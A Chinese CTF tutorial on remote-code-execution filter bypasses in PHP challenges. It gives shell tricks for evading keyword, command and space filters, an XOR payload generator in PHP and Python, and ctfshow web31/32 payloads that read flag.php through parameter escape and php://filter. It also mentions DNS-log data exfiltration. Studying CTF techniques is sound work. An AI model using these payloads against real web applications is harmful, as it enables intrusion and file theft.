RCE绕过及ctf多种玩法

RCE

推荐在线生成反弹shell的网站

[~]#棱角 ::Edge.Forum*

代码执行

PHP 代码执行函数:

eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort ()

命令执行

PHP 命令执行函数:

system()、exec()、shell_exec()、pcntl_exec()、popen()、proc_popen ()、passthru()等

绕过

关键词过滤

1、过滤flag关键字

利用通配符

cat fl* 匹配文件名前两位为fl的文件

cat ?l* 匹配文件名第一位随机,第二位为l的文件

2、转义符号、空变量( ∗ 、 *、 ∗、@、 x 、 x、 x、{x})

shell 复制代码
c\at f\lag.txt

cat fl''ag.txt

c'a't flag.txt
shell 复制代码
ca$*t fl$*ag.txt
ca$@t fl$@ag.txt
ca$3t fl$3ag.txt
ca${v}t fl${v}ag.txt

3、拼接法

shell 复制代码
a=f;b=lag;c=.txt;cat$IFS$a$b$c;

$IFS 等于空格

4、反引号

反引号在linux中代表命令执行

shell 复制代码
cat `ls` //查看目录下所有文件

5、编码

将被过滤的地方编码 然后利用解码命令执行

6、组合绝活

shell 复制代码
touch "g.txt"

touch "fla\\"

touch "t \\"

touch "ca\\"

ls -t > shell  //-t 按照时间排序

sh shell

7、异或无符号

例如下题,过滤掉所有字符了

将正则放进代码修改运行即可

php 复制代码
<?php
$myfile = fopen("xor_rce.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) {
    for ($j=0; $j <256 ; $j++) {

        if($i<16){
            $hex_i='0'.dechex($i);
        }
        else{
            $hex_i=dechex($i);
        }
        if($j<16){
            $hex_j='0'.dechex($j);
        }
        else{
            $hex_j=dechex($j);
        }
        $preg = '/[a-z0-9]/i'; //根据题目给的正则表达式修改即可
        if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
            echo "";
        }

        else{
            $a='%'.$hex_i;
            $b='%'.$hex_j;
            $c=(urldecode($a)^urldecode($b));
            if (ord($c)>=32&ord($c)<=126) {
                $contents=$contents.$c." ".$a." ".$b."\n";
            }
        }

    }
}
fwrite($myfile,$contents);
fclose($myfile);

生成txt后,使用下列python代码构造payload

python 复制代码
import requests
import urllib
from sys import *
import os


def action(arg):
    s1 = ""
    s2 = ""
    for i in arg:
        f = open("xor_rce.txt", "r")
        while True:
            t = f.readline()
            if t == "":
                break
            if t[0] == i:
                # print(i)
                s1 += t[2:5]
                s2 += t[6:9]
                break
        f.close()
    output = "(\"" + s1 + "\"^\"" + s2 + "\")"
    return (output)


while True:
    param = action(input("\n[+] your function:")) + action(input("[+] your command:")) + ";"
    print(param)

命令过滤

过滤cat

more:一页一页的显示档案内容

less:与 more 类似

head:查看头几行

tac:从最后一行开始显示,可以看出tac是cat的反向显示tai1:查看尾几行

nl:显示的时候,顺便输出行号

od:以二进制的方式读取档案内容

vi:一种编辑器,这个也可以查看

vim:一种编辑器,这个也可以查看

sort:可以查看

uniq:可以查看

file -f:报错出具体内容

sh /flag.txt //报错出文件内容

curl file:///root/f/flag

strings flag

uniq -c flag

bash -v flag

rev flag

空格过滤

%09(url传递)(cat%09flag.txt)

cat${IFS}flag.txt

a=flag;b=.txt;cat I F S IFS IFSa$b;

{cat,flag.txt}

无回显利用

1、直接写个文件看能否访问

2、直接进行对外访问(dnslog数据外带)

ctf多种玩法

参数逃逸

ctfshow-web31

?c=eval($_GET["aa"]);&aa=system("sort+flag.php");

rce转文件包含伪协议

ctfshow-web32

?c=include$_GET["code"]?>&code=php://filter/read=convert.base64-encode/resource=flag.php

?>在这里的作用是为了使得&code=被当作参数,而不是php代码执行

相关推荐
vortex56 分钟前
在Kali中使用虚拟环境安装python工具的最佳实践:以 pwncat 为例
linux·python·网络安全·渗透测试·pip·kali
Codingwiz_Joy15 分钟前
Day04 模拟原生开发app过程 Androidstudio+逍遥模拟器
android·安全·web安全·安全性测试
网络安全Ash4 小时前
2025网络安全漏洞
安全·web安全
黑客KKKing5 小时前
Refreshtoken 前端 安全 前端安全方面
大数据·前端·网络·安全·web安全
H轨迹H5 小时前
Vulnhub-election靶机
网络安全·渗透测试·vulnhub·ctf·信息收集·web漏洞·oscp
豪门土狗6 小时前
渗透测试之利用sql拿shell(附完整流程+防御方案)【上】
数据库·笔记·sql·网络安全
Hacker_Fuchen7 小时前
网络安全配置截图 网络安全i
网络·安全·web安全
vortex57 小时前
问题解决:Kali Linux 中配置启用 Vim 复制粘贴功能
linux·运维·网络安全·vim
远川_Horizon10 小时前
Lab17_ Blind SQL injection with out-of-band data exfiltration
sql·web安全
MC何失眠12 小时前
vulnhub靶场之【digitalworld.local系列】的snakeoil靶机
网络·学习·安全·web安全·网络安全